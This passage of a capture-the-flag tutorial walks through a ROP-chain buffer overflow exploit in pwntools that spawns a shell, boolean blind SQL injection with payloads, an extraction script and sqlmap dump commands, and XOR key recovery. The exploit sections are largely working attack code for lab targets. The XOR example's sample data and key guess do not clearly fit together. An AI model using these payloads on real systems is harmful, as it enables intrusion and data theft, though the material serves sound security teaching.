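def make_pattern(length: int) -> bytes:
    """Build a pattern of upper/lower/digit triples: Aa0Aa1Aa2...Ab0Ab1..."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length].encode()
    raise ValueError("length exceeds the 20280-byte pattern space")


def find_offset(pattern: bytes, observed: bytes) -> int:
    """Return the index of `observed` in the pattern, or -1 if absent."""
    return pattern.find(observed)


pattern = make_pattern(100)

# Simulated crash: suppose these 8 bytes sit at RSP when ret faults.
# (A debugger prints them as a little-endian integer; convert with
# value.to_bytes(8, "little") before searching.)
observed = pattern[72:80]
offset = find_offset(pattern, observed)
print(offset)
```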

Crafting the Payload (Python with pwntools):

from pwn import *

# Target binary and architecture
context.binary = elf = ELF('./vuln')
# context.arch = 'amd64' # Usually auto-detected

# Target IP and Port (if remote)
# p = remote('target.example.com', 1337)
p = process('./vuln') # Local process

# --- Information gathered ---
offset_to_rip = 72 # Determined via pattern analysis
# Assume we found these addresses using GDB/objdump/ropper
pop_rdi_ret = 0x401234 # Hypothetical address of 'pop rdi; ret' gadget
pop_rsi_ret = 0x401236 # Hypothetical address of 'pop rsi; ret' gadget
pop_rdx_ret = 0x401238 # Hypothetical address of 'pop rdx; ret' gadget
pop_rax_ret = 0x40123a # Hypothetical address of 'pop rax; ret' gadget
syscall_addr = 0x40123c # Hypothetical address of 'syscall' instruction
bin_sh_addr = 0x402000 # Hypothetical address of "/bin/sh" string in .data or .rodata

# --- Constructing the ROP Chain ---
# Goal: execve("/bin/sh", NULL, NULL); the execve syscall number on x86-64 Linux is 59.
# pwntools can also search for gadgets and assemble chains (rop = ROP(elf)); the chain
# is written out by hand here so that every stack slot is visible.
payload = b""
payload += b'A' * offset_to_rip # Padding to fill buffer and saved RBP
payload += p64(pop_rdi_ret)     # Overwrites the return address: first gadget
payload += p64(bin_sh_addr)     # Popped into RDI (pathname for execve)
payload += p64(pop_rsi_ret)     # Next gadget
payload += p64(0)               # Popped into RSI (argv = NULL)
payload += p64(pop_rdx_ret)     # Next gadget
payload += p64(0)               # Popped into RDX (envp = NULL)
payload += p64(pop_rax_ret)     # Next gadget
payload += p64(59)              # Popped into RAX (syscall number for execve)
payload += p64(syscall_addr)    # Finally, the syscall instruction

# The chain contains NUL bytes, so it only survives input paths that do not stop at
# NUL (for example read() on stdin). It is sent over the process's stdin here.
p.sendline(payload)

# Interact with the shell
p.interactive()

4.2) Web Exploitation: Blind SQL Injection

Challenge: A web application with a login form that does not display detailed error messages, making direct SQL injection difficult. The goal is to extract data (e.g., a flag) using blind techniques.

Vulnerable Application Logic (Conceptual):
A login form submits credentials to a backend script. The script constructs a query like:
SELECT * FROM users WHERE username = '$username' AND password = '$password';
If the query returns any rows, login is successful. If not, a generic "Invalid credentials" message is shown.

Exploitation Strategy (Boolean-based Blind SQLi):
We can infer information by observing the application's response to true/false conditions injected into the SQL query.

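Payload (Username field):
Let's assume a valid username is admin and that the flag is stored in a table named flags. The trailing -- starts a SQL comment that removes the password check; MySQL requires a space (or other whitespace) after it.

Confirm the injection point:
- Username: admin' AND 1=1 -- (Should log in)
- Username: admin' AND 1=2 -- (Should fail login)
If the two responses differ, the application is evaluating our injected condition.
Extract characters: We can iterate through characters and positions.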
- Check if the first character of the flag is 'f':
  - Username: admin' AND SUBSTRING((SELECT flag FROM flags LIMIT 1), 1, 1) = 'f' --
  - If the login succeeds, the first character is 'f'. If it fails, try 'g', 'h', etc.
- Check if the second character of the flag is 'l':
  - Username: admin' AND SUBSTRING((SELECT flag FROM flags LIMIT 1), 2, 1) = 'l' --

This process is automated using tools like sqlmap or custom scripts.
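A custom extraction script might look like the following sketch. To keep it self-contained, the "web application" is simulated by a vulnerable login function backed by an in-memory SQLite database; against a real target the login function would send an HTTP request and interpret the response instead. The table contents are made up, and SQLite's substr is used in place of SUBSTRING.

```python
import sqlite3
import string

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users (username TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', 'hunter2');
    CREATE TABLE flags (flag TEXT);
    INSERT INTO flags VALUES ('flag{blind}');
""")


def login(username: str, password: str) -> bool:
    """Vulnerable login: only a success/failure signal reaches the caller."""
    query = (
        f"SELECT * FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def extract_flag(max_len: int = 32) -> str:
    """Recover the flag one character at a time from the boolean oracle."""
    alphabet = string.ascii_letters + string.digits + "{}_"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            injected = (
                f"admin' AND substr((SELECT flag FROM flags LIMIT 1), {pos}, 1) "
                f"= '{ch}' -- "
            )
            if login(injected, "x"):
                recovered += ch
                break
        else:
            break   # no candidate matched: past the end of the flag
    return recovered


print(extract_flag())
```

A linear scan over the alphabet is the simplest approach; comparing character codes with a binary search reduces the number of requests per character considerably.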

Example sqlmap command:

sqlmap -u "http://example.com/login" --data="username=admin&password=password" --dbs # List databases
sqlmap -u "http://example.com/login" --data="username=admin&password=password" -D target_db --tables # List tables
sqlmap -u "http://example.com/login" --data="username=admin&password=password" -D target_db -T flags --columns # List columns in 'flags' table
sqlmap -u "http://example.com/login" --data="username=admin&password=password" -D target_db -T flags -C flag --dump # Dump the 'flag' column

4.3) Cryptography: Analyzing a Simple XOR Encrypted File

Challenge: A file (secret.enc) contains encrypted data. Analysis suggests a repeating XOR key.

Scenario:
secret.enc content: \x1d\x0e\x0e\x01\x0b\x0c\x04\x00\x11\x01\x00\x0c\x0b\x04\x00\x01\x00\x07\x00\x00\x04\x00\x01\x00\x0c\x0b\x04\x00\x1d\x0e\x0e\x01
We suspect a repeating XOR key.

Exploitation Strategy:

Key Length Determination (using Index of Coincidence - IC):

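The IC of uniformly random letters over a 26-letter alphabet is ~0.038 (1/26); for uniformly random bytes it is ~0.004 (1/256). For English text, it's ~0.067.
We can test potential key lengths by splitting the ciphertext into streams. For a candidate key length L, stream i consists of the bytes C[i], C[i+L], C[i+2L], ... If L is correct, every byte in a stream was XORed with the same key byte, so each stream is effectively a single-byte substitution of the plaintext and keeps the higher IC of natural language. Multiples of the true key length score high as well, so the smallest high-scoring length is usually the one to try first.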

from collections import Counter

def calculate_ic(data):
    n = len(data)
    if n == 0: return 0.0
    counts = Counter(data)
    ic = sum(count * (count - 1) for count in counts.values()) / (n * (n - 1))
    return ic

ciphertext = b'\x1d\x0e\x0e\x01\x0b\x0c\x04\x00\x11\x01\x00\x0c\x0b\x04\x00\x01\x00\x07\x00\x00\x04\x00\x01\x00\x0c\x0b\x04\x00\x1d\x0e\x0e\x01'
max_key_len = 20 # Test up to a reasonable key length

for key_len in range(1, max_key_len + 1):
    total_ic = 0.0
    num_streams = 0
    for i in range(key_len):
        stream = ciphertext[i::key_len] # Extract bytes at position i, i+L, i+2L, ...
        if len(stream) > 1:
            total_ic += calculate_ic(stream)
            num_streams += 1
    average_ic = total_ic / num_streams if num_streams > 0 else 0.0
    print(f"Key Length: {key_len}, Average IC: {average_ic:.4f}")

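# Interpretation: the key length whose average IC is closest to ~0.067 is the likeliest candidate.
# This sample is only 32 bytes long, so the scores are noisy, and long candidate lengths leave
# streams of just two or three bytes. The walkthrough below assumes key length 3 for illustration.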

Key Recovery (assuming key length 3):
Once key_len = 3 is identified, we can analyze each character stream independently.
- Stream 0: \x1d\x01\x04\x01\x0b\x01\x00\x00\x0c\x00\x0e (Bytes at indices 0, 3, 6, 9, 12, 15, 18, 21, 24, 27, 30)
- Stream 1: \x0e\x0b\x00\x00\x04\x00\x00\x01\x0b\x1d\x01 (Bytes at indices 1, 4, 7, 10, 13, 16, 19, 22, 25, 28, 31)
- Stream 2: \x0e\x0c\x11\x0c\x00\x07\x04\x00\x04\x0e (Bytes at indices 2, 5, 8, 11, 14, 17, 20, 23, 26, 29)
For each stream, the most frequent ciphertext byte is likely the most frequent plaintext character XORed with that stream's key byte. In English text that includes spaces, the most frequent character is usually the space (0x20); in text without spaces it is usually 'e' (0x65).
- In Stream 1 the most frequent byte is \x00 (4 of 11 bytes). If it corresponds to 'e' (ASCII 101), then key_byte_1 = 0x00 ^ 0x65 = 0x65; if it corresponds to a space, key_byte_1 = 0x00 ^ 0x20 = 0x20. Streams 0 and 2 have ties for the most frequent byte, which shows how unreliable frequency analysis is on so few bytes.
- By repeating this for all streams and checking which candidate bytes yield readable plaintext, we can deduce the key.
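Python for Decryption with a Candidate Key (Manual Guessing or Frequency Analysis):
```
def xor_decrypt(ciphertext, key):
    """XOR every ciphertext byte with the key, repeating the key as needed."""
    key_len = len(key)
    plaintext = bytearray()
    for i in range(len(ciphertext)):
        plaintext.append(ciphertext[i] ^ key[i % key_len])
    return bytes(plaintext)

# Assume we determined key length is 3 and guessed the key is "KEY".
# The key is a placeholder guess: substitute the bytes recovered from the
# per-stream analysis and check whether the output is readable.
key = b"KEY"
ciphertext = b'\x1d\x0e\x0e\x01\x0b\x0c\x04\x00\x11\x01\x00\x0c\x0b\x04\x00\x01\x00\x07\x00\x00\x04\x00\x01\x00\x0c\x0b\x04\x00\x1d\x0e\x0e\x01'
print(xor_decrypt(ciphertext, key))
```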

Source

Wikipedia page: https://en.wikipedia.org/wiki/Capture_the_flag_(cybersecurity)
Wikipedia API endpoint: https://en.wikipedia.org/w/api.php
AI enriched at: 2026-03-30T20:17:00.357Z